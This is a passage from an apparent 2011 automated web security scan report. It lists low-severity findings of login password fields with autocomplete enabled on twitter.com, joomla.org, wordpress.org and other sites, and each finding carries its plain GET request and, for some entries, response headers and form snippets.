<br />
<input type="password" class="inputbox frontlogin" name="passwd" id="password" />
</label>
...[SNIP]...

15.68. http://people.joomla.org/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://people.joomla.org
Path:	/

Issue detail

The page contains a form with the following action URL:

http://people.joomla.org/index.php

The form contains the following password field with autocomplete enabled:

passwd

Request

GET / HTTP/1.1
Host: people.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.69. http://people.joomla.org/groups/viewdiscussion/996-Joomla®%2016%20Has%20Arrived.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://people.joomla.org
Path:	/groups/viewdiscussion/996-Joomla..%2016%20Has%20Arrived.html

Issue detail

The page contains a form with the following action URL:

http://people.joomla.org/groups.html

The form contains the following password field with autocomplete enabled:

passwd

Request

Response

15.70. http://resources.joomla.org/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://resources.joomla.org
Path:	/

Issue detail

The page contains a form with the following action URL:

http://resources.joomla.org/index.php

The form contains the following password field with autocomplete enabled:

passwd

Request

GET / HTTP/1.1
Host: resources.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.71. http://resources.joomla.org/directory/advsearch.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://resources.joomla.org
Path:	/directory/advsearch.html

Issue detail

The page contains a form with the following action URL:

http://resources.joomla.org/directory.html

The form contains the following password field with autocomplete enabled:

passwd

Request

GET /directory/advsearch.html HTTP/1.1
Host: resources.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 041c772b92563f566daacce0f3f536ce=089d7ea1d8ba80fb168608272f1090c1; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:10 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph
...[SNIP]...
</h3>
                   <form action="/directory.html" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

15.72. http://resources.joomla.org/directory/new.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://resources.joomla.org
Path:	/directory/new.html

Issue detail

The page contains a form with the following action URL:

http://resources.joomla.org/directory.html

The form contains the following password field with autocomplete enabled:

passwd

Request

GET /directory/new.html HTTP/1.1
Host: resources.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 041c772b92563f566daacce0f3f536ce=0b0ec261643fa10923bfbfaa489de5ba; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:10 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph
...[SNIP]...
</h3>
                   <form action="/directory.html" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

15.73. http://resources.joomla.org/how-to-add-listings.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://resources.joomla.org
Path:	/how-to-add-listings.html

Issue detail

The page contains a form with the following action URL:

http://resources.joomla.org/how-to-add-listings.html

The form contains the following password field with autocomplete enabled:

passwd

Request

GET /how-to-add-listings.html HTTP/1.1
Host: resources.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 041c772b92563f566daacce0f3f536ce=d7fb4f14f3981668855c2cc50303ff38; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph
...[SNIP]...
</h3>
                   <form action="/how-to-add-listings.html" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

15.74. http://slashdot.org/bookmark.pl previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://slashdot.org
Path:	/bookmark.pl

Issue detail

The page contains a form with the following action URL:

http://slashdot.org/login.pl

The form contains the following password field with autocomplete enabled:

upasswd

Request

GET /bookmark.pl?url={u}&title={t} HTTP/1.1
Host: slashdot.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.75. http://slashdot.org/bookmark.pl previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://slashdot.org
Path:	/bookmark.pl

Issue detail

The page contains a form with the following action URL:

http://slashdot.org/login.pl

The form contains the following password field with autocomplete enabled:

upasswd

Request

GET /bookmark.pl?url={u}&title={t} HTTP/1.1
Host: slashdot.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.76. http://spongecell.com/event_list previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://spongecell.com
Path:	/event_list

Issue detail

The page contains a form with the following action URL:

http://spongecell.com/promote/website/login

The form contains the following password field with autocomplete enabled:

Request

GET /event_list HTTP/1.1
Host: spongecell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.77. http://themehybrid.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://themehybrid.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://themehybrid.com/blog/wp-login.php

The form contains the following password field with autocomplete enabled:

Request

Response

15.78. http://themehybrid.com/themes/shadow previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://themehybrid.com
Path:	/themes/shadow

Issue detail

The page contains a form with the following action URL:

http://themehybrid.com/blog/wp-login.php

The form contains the following password field with autocomplete enabled:

Request

GET /themes/shadow HTTP/1.1
Host: themehybrid.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.79. http://twitter.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.80. http://twitter.com/7News/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/7News/

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /7News/ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.81. http://twitter.com/7News/newsteam previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/7News/newsteam

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /7News/newsteam HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:05:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910349-62168-50610
ETag: "da817aed8ad2f932b9830e8a84480989"
Last-Modified: Mon, 24 Jan 2011 23:05:49 GMT
X-Runtime: 0.57960
Content-Type: text/html; charset=utf-8
Content-Length: 57201
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910347880108; path=/; expires=Mon, 31-Jan-11 23:05:47 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591034914123817; path=/; expires=Wed, 23 Feb 2011 23:05:49 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlN2Q0ZTFiOTJmMGY0NmRjMTgyZTZkMjQ3ZTFlMjE1%250ANTk6DnJldHVybl90byImaHR0cDovL3R3aXR0ZXIuY29tLzdOZXdzL25ld3N0%250AZWFtOgdpZCIlZDI1NjgyOTUxYTU1YzRjZDc1MzNiNTE3NWVjOTllMGUiCmZs%250AYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6%250ACkB1c2VkewA6D2NyZWF0ZWRfYXRsKwhXqUa6LQE%253D--b059b0e115ff03027e8577c5a6c0808a3211765e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="1b91c04dd6ff02fcee77cc1866295f3e0edd006e" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

15.82. http://twitter.com/7news previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/7news

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /7news HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.83. http://twitter.com/LizPW/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/LizPW/

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /LizPW/ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.84. http://twitter.com/cw56 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/cw56

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /cw56 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.85. http://twitter.com/datasift previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/datasift

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /datasift HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:01:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964110-52502-21616
ETag: "98dfab6f65418ae81b99a43c3a15ba6b"
Last-Modified: Tue, 25 Jan 2011 14:01:50 GMT
X-Runtime: 0.41713
Content-Type: text/html; charset=utf-8
Content-Length: 46413
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964108154865; path=/; expires=Tue, 01-Feb-11 14:01:48 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596411037165831; path=/; expires=Thu, 24 Feb 2011 14:01:50 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlNWEwYzM3OTNmYjE1ZjAwZDgyZTA4NTA1Y2ZiMGJh%250AZDU6DnJldHVybl90byIgaHR0cDovL3R3aXR0ZXIuY29tL2RhdGFzaWZ0Ogdp%250AZCIlNTM1ZTA1NTY3NDFkOGQ5Zjk2ZGQ2NjkwMWQ2NTA1NTciCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2Vk%250AewA6D2NyZWF0ZWRfYXRsKwgl%252Fnq9LQE%253D--53648523a8885e6e9f30528d0faecbf003a6ff95; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="e70bfa26abb625d5f91ba2867247832dddb8368d" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

15.86. http://twitter.com/joomla previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/joomla

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /joomla HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.87. http://twitter.com/kontentdesign previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/kontentdesign

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /kontentdesign HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.88. http://twitter.com/nbc/primetime previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/nbc/primetime

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /nbc/primetime HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:06:59 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910418-13129-32425
ETag: "a5a44db8a71fab6b9f2580b61e51bac4"
Last-Modified: Mon, 24 Jan 2011 23:06:58 GMT
X-Runtime: 0.49830
Content-Type: text/html; charset=utf-8
Content-Length: 57012
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910418725856; path=/; expires=Mon, 31-Jan-11 23:06:58 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591041889118308; path=/; expires=Wed, 23 Feb 2011 23:06:58 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYWNhY2QyMDk5NWYxMWM2MjRjNGQ0NDdhYTA1ZTQ3%250AYzA6DnJldHVybl90byIlaHR0cDovL3R3aXR0ZXIuY29tL25iYy9wcmltZXRp%250AbWU6B2lkIiU0NDZjYzZhOTY2NmJmZTZlZjQ3OGQ5ZGIyYmQxYzRiMCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCM25R7otAQ%253D%253D--d1e94695604015df0d84f87d3e421b29e16e392e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="c7f404ddc4078feffab8324e4849dfde0a1cd943" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

15.89. http://twitter.com/netlingo previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/netlingo

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /netlingo HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:02:03 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964123-67769-3429
ETag: "8ed7c55c146db619fdf925948244e6a4"
Last-Modified: Tue, 25 Jan 2011 14:02:03 GMT
X-Runtime: 0.57870
Content-Type: text/html; charset=utf-8
Content-Length: 48756
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964121273602; path=/; expires=Tue, 01-Feb-11 14:02:01 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596412316680845; path=/; expires=Thu, 24 Feb 2011 14:02:03 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlNGZlYmY1Yjc5NTA0ZjkwYmIwMWI5OGEyZDMyZTM1%250AYjk6DnJldHVybl90byIgaHR0cDovL3R3aXR0ZXIuY29tL25ldGxpbmdvOgdp%250AZCIlNDAzOGVkNGRhYjIyMmJkOGY3ZGY1YjQzNjEzOWM1MDciCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2Vk%250AewA6D2NyZWF0ZWRfYXRsKwgfMHu9LQE%253D--a495d11ca78d3b4eafce746e4006ed9d057939a8; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="b300943fab3122b87ecf85f0eb426b978e47dbbb" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

15.90. http://twitter.com/spies_assassins previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/spies_assassins

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /spies_assassins HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:01:07 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964066-9198-19132
ETag: "d25862c279dba6cd1e553cac20d22d67"
Last-Modified: Tue, 25 Jan 2011 14:01:06 GMT
X-Runtime: 0.81721
Content-Type: text/html; charset=utf-8
Content-Length: 53400
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964064205570; path=/; expires=Tue, 01-Feb-11 14:01:04 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596406668777691; path=/; expires=Thu, 24 Feb 2011 14:01:06 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlOTFhMjVhMGYxN2MzNTI1ZTQ5ZmUzZjczMmNkZjE3%250AMjc6DnJldHVybl90byInaHR0cDovL3R3aXR0ZXIuY29tL3NwaWVzX2Fzc2Fz%250Ac2luczoHaWQiJTYzMTVlMzExN2JlZWI3ZTk3NzRhNmY4YzVlZGMxZGFhIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIgVN6vS0B--19cfe0462f0d48cd362b4b7b652a3c4766f21675; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="2c19aa408894b1b3a6ef17575d530616dbc7b970" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

15.91. http://twitter.com/tweetmeme previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/tweetmeme

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /tweetmeme HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.92. http://twitter.com/typekit previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/typekit

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /typekit HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.93. http://twitter.com/ups previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/ups

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /ups HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.94. http://venedet.michnica.net/index.php/joomla/1-joomla-16-je-tu previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://venedet.michnica.net
Path:	/index.php/joomla/1-joomla-16-je-tu

Issue detail

The page contains a form with the following action URL:

http://venedet.michnica.net/index.php/component/comprofiler/login

The form contains the following password field with autocomplete enabled:

passwd

Request

GET /index.php/joomla/1-joomla-16-je-tu HTTP/1.1
Host: venedet.michnica.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.95. http://wordpress.org/extend/plugins/tweetmeme-follow-button/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://wordpress.org
Path:	/extend/plugins/tweetmeme-follow-button/

Issue detail

The page contains a form with the following action URL:

http://wordpress.org/extend/plugins/bb-login.php

The form contains the following password field with autocomplete enabled:

password

Request

GET /extend/plugins/tweetmeme-follow-button/ HTTP/1.1
Host: wordpress.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.96. http://wordpress.org/extend/plugins/tweetmeme/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://wordpress.org
Path:	/extend/plugins/tweetmeme/

Issue detail

The page contains a form with the following action URL:

http://wordpress.org/extend/plugins/bb-login.php

The form contains the following password field with autocomplete enabled:

password

Request

GET /extend/plugins/tweetmeme/ HTTP/1.1
Host: wordpress.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.97. http://wordpress.org/extend/plugins/wp-pagenavi/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://wordpress.org
Path:	/extend/plugins/wp-pagenavi/

Issue detail

The page contains a form with the following action URL:

http://wordpress.org/extend/plugins/bb-login.php

The form contains the following password field with autocomplete enabled:

password

Request

GET /extend/plugins/wp-pagenavi/ HTTP/1.1
Host: wordpress.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.98. http://www.adside.com/adside/advertiser.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.adside.com
Path:	/adside/advertiser.html

Issue detail

The page contains a form with the following action URL:

http://www.adside.com/adside/advertiser.html

The form contains the following password field with autocomplete enabled:

password

Request

GET /adside/advertiser.html HTTP/1.1
Host: www.adside.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.99. http://www.adside.com/adside/publisher.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.adside.com
Path:	/adside/publisher.html

Issue detail

The page contains a form with the following action URL:

http://www.adside.com/adside/publisher.html

The form contains the following password field with autocomplete enabled:

password

Request

GET /adside/publisher.html HTTP/1.1
Host: www.adside.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.100. http://www.americascupmedia.com/index.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.americascupmedia.com
Path:	/index.php

Issue detail

The page contains a form with the following action URL:

http://www.americascupmedia.com/index.php

The form contains the following password field with autocomplete enabled:

Request

GET /index.php HTTP/1.1
Host: www.americascupmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.101. http://www.barkerstores.com/soundings/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.barkerstores.com
Path:	/soundings/

Issue detail

The page contains a form with the following action URL:

http://www.barkerstores.com/soundings/Default.aspx

The form contains the following password field with autocomplete enabled:

_ctl2:login:txtPassword

Request

GET /soundings/ HTTP/1.1
Host: www.barkerstores.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.102. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
